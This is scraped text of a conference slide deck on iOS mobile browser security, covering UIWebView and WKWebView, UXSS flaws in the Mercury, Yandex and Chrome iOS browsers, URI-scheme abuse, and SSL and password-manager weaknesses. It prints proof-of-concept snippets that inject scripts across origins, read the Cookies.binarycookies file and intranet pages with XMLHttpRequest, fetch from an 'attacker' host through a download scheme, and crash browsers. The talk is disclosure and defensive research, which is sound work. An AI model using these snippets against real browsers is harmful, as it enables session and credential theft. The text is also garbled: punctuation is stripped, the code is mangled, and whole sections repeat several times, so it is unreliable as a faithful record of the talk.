Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 38: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/38.jpg)
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 39: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/39.jpg)
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 40: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/40.jpg)
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 41: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/41.jpg)
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
